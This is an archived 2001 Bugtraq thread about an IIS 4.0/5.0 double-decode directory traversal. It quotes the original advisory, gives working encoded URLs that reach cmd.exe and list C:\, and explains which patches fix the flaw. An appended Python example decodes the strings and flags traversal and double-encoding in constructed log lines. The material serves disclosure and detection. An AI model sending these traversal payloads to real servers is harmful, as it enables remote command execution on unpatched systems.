[22683] in bugtraq
Re: New vulnerability in IIS4.0/5.0
daemon@ATHENA.MIT.EDU (Dave Ahmad)
Wed Sep 19 15:54:28 2001
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: ALife // BERG <buginfo@inbox.ru>
Cc: <Bugtraq@securityfocus.com>
In-Reply-To: <E15jdo8-000NZy-00@f12.port.ru>
Message-ID: <Pine.GSO.4.30.0109191127570.19628-100000@mail>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
This seems to be just another way to exploit the double decode
vulnerability (Bugtraq ID 2708). There is a possibility that it may be a
new issue due to the use of the '%u' method of encoding. It does not look
that way to us.
On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).
Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:
The attack string used successfully against an IIS server (Win2K, SP2):
http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c+dir+c:\
first decode sequence (it replaces %u0025 with %)
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
second decode sequence (it replaces %u005c with /)
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
The double decode vulnerability is fixed in MS01-026. I believe the fix
is included in the cumulative patch released with MS01-044.
It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.
Has anyone managed to exploit a patched system?
Thanks Ryan & eEye.
Regards,
Dave Ahmad
Security Focus
www.securityfocus.com
On Wed, 19 Sep 2001, ALife // BERG wrote:
> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[ Description
>
> For example, the target has a virtual executable directory (e.g.
> "scripts") that is located on the same drive as the Windows system.
> Submit a request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> The directory listing of C:\ will be revealed.
>
> Of course, the same effect can be achieved by applying this kind of
> processing to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> "..%u0025%u005c" ...
>
> Note: The attacker can run commands only with the privileges of the
> IUSR_machinename account.
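The two-step decode that Ryan Permeh breaks down above, and the check a server needs so that a second decode pass cannot happen after the path has been validated, as an added example (this is illustrative code written for this archive page, not Microsoft's, eEye's or SecurityFocus's code). It assumes a simplified model of the IIS decoder that understands both %XX and the IIS-specific %uXXXX escape, a virtual directory named /scripts, and a handful of constructed request lines; none of these are from the original messages. decode_trace reproduces the breakdown for the %u0025u005c string, canonical_path does what a fixed server should do (decode once, treat '\' as a separator, resolve '..', and never decode again), and classify_request flags a request either because a second decode would still change it (the double-encoding signature) or because its canonical path escapes the virtual directory, which also covers the plain %u005c, %u002f and %u002e variants in the advisory.

```python
import re
from posixpath import normpath

# One percent-escape of either form: the IIS-specific %uXXXX, or the
# standard %XX.  The two forms cannot overlap because 'u' is not a hex digit.
_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def decode_once(s: str) -> str:
    """One pass of percent-decoding.  Output is never re-scanned, so
    '%u0025u005c' becomes '%u005c' here and only a second pass turns it
    into a backslash.  (Simplified model of the IIS decoder, not its code.)"""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_trace(s: str, max_rounds: int = 4) -> list[str]:
    """[original, after 1 pass, after 2 passes, ...] until a pass is a no-op.
    Reproduces the two-step breakdown quoted in the reply above."""
    trace = [s]
    for _ in range(max_rounds):
        nxt = decode_once(trace[-1])
        if nxt == trace[-1]:
            break
        trace.append(nxt)
    return trace


def canonical_path(raw: str) -> str:
    """Decode exactly once, treat '\\' as a separator (as Windows does) and
    resolve '..'.  This is the form a server must check, and it must not
    decode again afterwards; doing so is the double-decode bug."""
    decoded = decode_once(raw).replace("\\", "/")
    return normpath("/" + decoded.lstrip("/"))


def classify_request(raw_path: str, vdir: str = "/scripts") -> str:
    """'double-encoded' if a second decode pass would still change the path
    (the client escaped '%' itself); 'traversal' if the canonical path
    leaves the virtual directory it was requested under; otherwise 'ok'."""
    once = decode_once(raw_path)
    if decode_once(once) != once:
        return "double-encoded"
    canon = canonical_path(raw_path)
    if canon != vdir and not canon.startswith(vdir + "/"):
        return "traversal"
    return "ok"


# Constructed request lines (not real logs): "client method raw-uri-stem".
SAMPLE_LOG = """\
10.0.0.5 GET /scripts/hello%20world.asp
10.0.0.7 GET /scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe
10.0.0.7 GET /scripts/..%u005c..%u005cwinnt/system32/cmd.exe
10.0.0.9 GET /scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe
10.0.0.9 GET /scripts/.%u002e/.%u002e/winnt/system32/cmd.exe
"""


def scan_log(text: str = SAMPLE_LOG) -> list[tuple[str, str]]:
    """Run classify_request over each line; returns (raw path, verdict)."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _client, _method, path = line.split(maxsplit=2)
        out.append((path, classify_request(path)))
    return out


if __name__ == "__main__":
    for step in decode_trace(
            "/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe"):
        print(step)
    for path, verdict in scan_log():
        print(f"{verdict:15} {path}")
```

The important design point is the order of operations in classify_request and canonical_path: the path is decoded once, canonicalized, and only then compared against the virtual directory, and a request whose once-decoded form would still change under another decode is rejected outright rather than decoded further. That is the property the MS01-026 fix restores; a server that canonicalizes first and decodes again afterwards sees "/scripts/..%u005c..%u005cwinnt" at check time and "/scripts/..\..\winnt" at execution time.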